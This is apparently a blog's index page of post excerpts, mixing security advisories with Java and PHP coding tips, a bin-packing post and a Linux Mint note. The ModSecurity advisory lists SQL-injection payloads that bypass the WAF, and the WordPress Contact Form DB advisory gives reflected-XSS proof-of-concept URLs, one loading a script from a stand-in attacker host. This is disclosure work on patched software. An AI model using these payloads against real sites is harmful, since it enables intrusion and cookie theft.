Bypass CSRF Protection via XSS

In this post I will show why anti-CSRF tokens are useless as soon as there is an XSS vulnerability in the target site. This post contains all the example scripts necessary to reproduce bypassing CSRF protection via XSS vulnerabilities. The code is meant for educational purposes only.

Basic Terms: CSRF and XSS

CSRF means Cross-Site Request Forgery. The idea is to get a user that is logged in at a website to perform actions on that site they do not actually want to perform. This can be achieved by getting the victim to visit a website (possibly – but not necessarily – owned by the attacker) that contains specially crafted HTML code created by the attacker. CSRF is possible with POST as well as GET requests (although as per REST, GET requests shouldn’t actually change data on the server).

Anti-CSRF token is the recommended way to prevent CSRF. A one time token is stored in the session as well as the form when creating it, and when the form is submitted, the submitted token is compared to the session token. If they match, there is no CSRF attack.

XSS means cross-site scripting, and it allows an attacker to execute arbitrary JavaScript in the victims browser in the context of the vulnerable website.

Mod_Security Bypass Login (CRS, SQL Injection)

  • Vulnerability: Bypass mod_security to perform SQL injection (login bypass)
  • Affected Software: OWASP ModSecurity Core Rule Set
  • Affected Version: 2.2.9 (probably also prior versions)
  • Patched Version: 3.0.0
  • Risk: Low
  • Vendor Contacted: 2014-12-07 via mail, 2015-02-18 via github
  • Vendor Fix: 2014-12-09 (in dev tree, independent of report)
  • Public Disclosure: 2015-02-18 on github

Mod_Security & Core Rule Set

mod_security is an Intrusion Detection System / Web Application Firewall for Apache, IIS, and nginx developed by SpiderLabs. As a filter list it uses the OWASP ModSecurity Core Rule Set.

Injection Payload

Using the Core ModSecurity Rule Set ver.2.2.9 with default configuration, SecRuleEngine On, and all base_rules enabled, it is possible to inject the following payload, which can be used to bypass filters in SQL queries:

foo' or true #
foo' or false #

Comparison of Java Code Quality Tools

With a growing code base, it is good to have tools which can automatically find weaknesses in it, be it duplicate code, bad patterns, possible bugs, bad formatting, or bad design. Here are some of the tools that can analyze Java Code. CheckStyle, FindBugs, PMD – Java Static Code Analysis Google CodePro AnalytiX Eclipse Build-In Java Static Code Analysis NetBeans Java Hints – Java Static Code Analysis iSpace – Dependency Graph QJ-Pro: Java Static Code Analysis Lint4j – Java Static Code Analysis SonarQube Further

MongoDB: NoSQL Injection & Security

A list of resources about NoSQL injection in general and PHP and MongoDB security specifically.

Intro: NoSQL Databases

NoSQL databases such as MongoDB are used more and more, but there isn’t a lot of information about the security of specific NoSQL databases or the security of NoSQL in general.

The direction it seems to be going is: It’s not SQL, so SQL injection is not possible, so it is secure. This is of course not true at all. The damage that can be achieved with NoSQL injections does seem to be smaller than that of SQL injection, but that does not mean that developers should not care about it.

Reflected XSS in WordPress Contact Form DB Plugin

  • Vulnerability: Reflected XSS
  • Affected Software: Contact Form DB (WordPress Plugin)
  • Affected Version: 2.8.17 (probably also prior versions)
  • Patched Version: 2.8.18
  • Risk: Medium
  • Vendor Contacted: 2014-11-17
  • Vendor Fix: 2014-11-19
  • Public Disclosure: 2014-11-26

Description

There are two XSS vulnerabilities in the Contact Form DB WordPress Plugin admin area. If an attacker can get an administrator to click on a specific link, this can lead to the execution of arbitrary JavaScript, which in turn can for example lead to the stealing of cookies.

Simple POC

As single quotes are automatically escaped in WordPress, they cannot be used in the attack. It is still possible to inject a simple alert:

via submit_time:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1&submit_time=1416134948.8682" type="hidden"><script>alert(String.fromCharCode(88,83,83))</script><input name="1416134948.8682

via form_name:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1"><script>alert(String.fromCharCode(88,83,83));</script>

Exploiting the vulnerability

To get around the limitation of not using single quotes, an attacker can load a remotely hosted script:

http://localhost/wordpress/wp-admin/admin.php?page=CF7DBPluginSubmissions&form_name=Contact+form+1&submit_time=1416134948.8682" type="hidden"><script src=http://evil.attacker/myscript.js></script>

Java Timing Code: Compare Execution Times of Methods

Often times, you will have two Java functions, and you will want to know which one performs better. You can use this Java class to time multiple methods to find out which one is faster.

Example Usage: Java Timing Code

Let’s say you have these two functions and want to know which one is faster:

public static String function1(String i) {
    return i + i;
}

public static String function2(String i) {
    StringBuilder sb = new StringBuilder();
    sb.append(i);
    sb.append(i);
    return sb.toString();
}

Here is how you would use my timing class:

public static void simpleTimingTest() throws Exception {
    Timing t = new Timing();

    /*
    The timing function will run the tests in chunks.
    For each chunk, the same input will be used.

    Input will be gathered via the passed IntFunction. The timing method will
    pass the current index (going from 0 to amountRunsPerChunk) to it and will expect
    any return of the defined type.
    */
    IntFunction<String> inputProvider = i -> String.valueOf(i);

    /*
    The add method expects two functions: the above mentioned input provider,
    as well as a function which accepts the output from the input provider as input
    and applies it to the function which will be timed.
    */
    t.add((String s) -> function1(s), inputProvider, "function1 ");
    t.add((String s) -> function2(s), inputProvider, "function2 ");

    t.time(true); // true: force test (otherwise, time might throw an exception
                  // if it suspects that there isn't enough memory)
    t.output(s -> System.out.println(s), Timing.Sort.ASC);
}

You can also do more complex things with it:

public static void predefinedInputTimingTest() throws Exception {
    Timing t = new Timing();
    /*
    The input doesn't have to be generated using the passed index, you could
    also use predefined input to time your functions:
    */
    String[] input = new String[]{"input1", "another input", "more input"};
    IntFunction<String> inputProvider = i -> input[i % input.length];
    t.add((String s) -> function1(s), inputProvider, "function1 ");
    t.add((String s) -> function2(s), inputProvider, "function2 ");

    /*
    You can decide what should be reported when timing finished:
    */
    t.setReport(EnumSet.of(Timing.Report.NAME, Timing.Report.MEAN));
    t.setAmountChunks(1_500);
    t.setAmountRunsPerChunk(2_500);
    t.time(true, s -> System.out.println(s)); // pass String -> String function to report debug information
    t.output(s -> System.out.println(s), Timing.Sort.ASC);
}

Refactoring Deeply Nested if Statements

Deeply nested if statements are a pain to read and maintain, so you should try to avoid them as much as possible. Here are a couple of suggestions on how reduce deeply nested if statements to a more manageable size.

Most of these suggestions can be applied to most languages that have the if statement, at least most object oriented or procedural languages. But my main focus when writing this were Java and PHP.

Early Return

Early returns should be used a lot more often by pretty much everybody. It’s one of the easiest ways to avoid or reduce deeply nested if statements and one of the first things I would look for when refactoring code.

The main idea is that when checking a value, the negative case is moved up-front, the error handled, and then the method is exited:

boolean test1 = ...;
if (test1) {
    boolean test2 = ...;
    if(test2) {
        boolean test3 = ...;
        if(test3) {
            // do the stuff
        } else {
            // some error, handle it
        }
    } else {
        // something else
    }
} else {
    // some other error, handle it
}
return;

Here, you can move the checks to the top of the method and remove three levels of nested if statements:

boolean test1 = ...;
if(!test1) {
    // some other error, handle it
    return;
}
boolean test2 = ...;
if(!test2) {
    // something else
    return;
}
boolean test3 = ...;
if(!test3) {
    // some error, handle it
    return;
}
// do the stuff
return;

Refactoring Simple Boolean Checks in if-Statements

How to refactor simple boolean checks in if statements and avoid bad practices. This is the first post out of a number of posts dealing with refactoring. This particular post is aimed at beginners, but further posts will contain somewhat more advanced concepts. The concepts presented here can be used in a lot of programming languages, but the article is written with Java, PHP, and JavaScript in mind. For one-liners, the general formating will look like this:

Bin Packing Algorithm (Java)

In this post I will present example Java code for solving the Bin Packing Problem. I will not go into what exactly Bin Packing is, as there are enough websites that do a good job describing it. As always, wikipedia is a good start to get a general overview: Wikipedia Bin Packing Problem. Bin Packing: Brute Force Solution Bin Packing: First Fit Decreasing Algorithm Download Source Code for Bin Packing Problem Bin Packing: Brute Force Solution To check all possible solutions for the bin packaging problem (brute force), a recursive approach can be used: Iterate over all bins, try to put the current item in the bin and – if it fits – call the same method with the next item.

Linux Mint: Remove PPA

Linux Mint does not provide the option to remove a ppa. If you try it, this will be the result: sudo add-apt-repository --remove ppa:somePPA/ppa Usage: add-apt-repository [options] repository add-apt-repository: error: no such option: --remove But you can still manually remove a ppa in Linux Mint by removing the file that defines it. All ppa are defined in /etc/apt/sources.list.d . So you can do the following: # find the correct ppa file to delete by listing all ppa files: ls /etc/apt/sources.